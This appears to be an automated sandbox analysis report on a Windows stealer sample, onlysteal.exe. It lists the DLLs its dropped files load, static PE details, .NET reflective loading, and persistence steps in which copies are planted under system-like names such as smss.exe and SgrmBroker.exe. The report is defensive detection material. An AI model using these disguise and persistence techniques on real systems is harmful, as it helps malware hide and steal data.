Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: propsys.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: apphelp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: dlnashext.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: wpdshext.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: edputil.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: urlmon.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: iertutil.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: srvcli.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: netutils.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: wintypes.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: appresolver.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: bcp47langs.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: slc.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: userenv.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: sppc.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe  Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com  Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com  Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE  Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE  Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE  Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE  Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE  Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE  Section loaded: winnsi.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: mscoree.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: version.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: windows.storage.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: wldp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: profapi.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: cryptsp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: rsaenh.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: cryptbase.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: sspicli.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: ktmw32.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: rasapi32.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: rasman.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: rtutils.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: mswsock.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: winhttp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: iphlpapi.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: dhcpcsvc.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: dnsapi.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: uxtheme.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: propsys.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: apphelp.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: dlnashext.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: wpdshext.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: edputil.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: urlmon.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: iertutil.dll
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe  Section loaded: srvcli.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: netutils.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wintypes.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: appresolver.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: slc.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: userenv.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: sppc.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: mscoree.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: version.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wldp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: profapi.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: sspicli.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ktmw32.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rasapi32.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rasman.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rtutils.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: mswsock.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: winhttp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: propsys.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: apphelp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dlnashext.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wpdshext.dll
                                  Source: C:\Users\user\Desktop\onlysteal.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: onlysteal.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: onlysteal.exe
                                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: SgrmBroker.exe, 00000011.00000002.2764836451.000000001BAFB000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: System.pdb source: SgrmBroker.exe, 00000011.00000002.2764836451.000000001BAFB000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdll source: SgrmBroker.exe, 0000001B.00000002.3343374036.000000000105A000.00000004.00000020.00020000.00000000.sdmp
                                  Source: onlysteal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: onlysteal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: onlysteal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: onlysteal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: onlysteal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, 1a2.cs | .Net Code: ghM System.Reflection.Assembly.Load(byte[])
Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, 857.cs | .Net Code: _736
Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, 1a2.cs | .Net Code: ghM System.Reflection.Assembly.Load(byte[])
Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, 857.cs | .Net Code: _736
Source: C:\Users\user\Desktop\onlysteal.exe | File created: C:\Intorefnet\__tmp_rar_sfx_access_check_7327421
Source: onlysteal.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_0024F640 push ecx; ret 0_2_0024F653
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_0024EB78 push eax; ret 0_2_0024EB96
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | Code function: 5_2_00007FFD34883CB9 push ebx; retf 5_2_00007FFD34883CBA
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | Code function: 5_2_00007FFD348800BD pushad ; iretd 5_2_00007FFD348800C1
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | Code function: 5_2_00007FFD3489739E push ebp; retf 5_2_00007FFD348973A8
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | Code function: 5_2_00007FFD34A60878 push esp; retf 5_2_00007FFD34A60879
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 11_2_00007FFD348A00BD pushad ; iretd 11_2_00007FFD348A00C1
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 11_2_00007FFD348B739E push ebp; retf 11_2_00007FFD348B73A8
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 11_2_00007FFD34A85BBD push ebx; ret 11_2_00007FFD34A85BCA
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 17_2_00007FFD348C00BD pushad ; iretd 17_2_00007FFD348C00C1
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 17_2_00007FFD348D739E push ebp; retf 17_2_00007FFD348D73A8
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 17_2_00007FFD34AA5BBD push ebx; ret 17_2_00007FFD34AA5BCA
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 22_2_00007FFD348900BD pushad ; iretd 22_2_00007FFD348900C1
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 22_2_00007FFD34A75BBD push ebx; ret 22_2_00007FFD34A75BCA
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 27_2_00007FFD348900BD pushad ; iretd 27_2_00007FFD348900C1
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 27_2_00007FFD348A7BAC push eax; ret 27_2_00007FFD348A7BAD
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 27_2_00007FFD348A739E push ebp; retf 27_2_00007FFD348A73A8
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 27_2_00007FFD34A75BBD push ebx; ret 27_2_00007FFD34A75BCA

                                  Persistence and Installation Behavior

                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\ProgramData\smss.exeJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile written: C:\Program Files (x86)\Internet Explorer\SIGNUP\IadHSrMxJwYAMPkyRTLDEKgeW.exeJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\ProgramData\smss.exeJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\wYGfctxY.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\kzbsFheO.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\user\Desktop\vmGXvtnF.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\zVMHRGyj.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\Default\Saved Games\IadHSrMxJwYAMPkyRTLDEKgeW.exeJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\user\Desktop\plugneHL.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exeJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\RpedHXOW.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\BUHwkZnR.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\DYEovgjB.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\FPzqkKvM.logJump to dropped file
                                  Source: C:\Users\user\Desktop\onlysteal.exeFile created: C:\Intorefnet\hyperBlockCrtCommon.exeJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Program Files (x86)\Internet Explorer\SIGNUP\IadHSrMxJwYAMPkyRTLDEKgeW.exeJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\AchrHOgY.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\ProgramData\smss.exeJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\user\Desktop\vmGXvtnF.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\user\Desktop\plugneHL.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\BUHwkZnR.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\wYGfctxY.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\DYEovgjB.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\RpedHXOW.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\kzbsFheO.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\zVMHRGyj.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\AchrHOgY.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\FPzqkKvM.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\Default\Start Menu\Programs\SgrmBroker.exeJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\Default\Start Menu\Programs\91e168f4ec1147Jump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
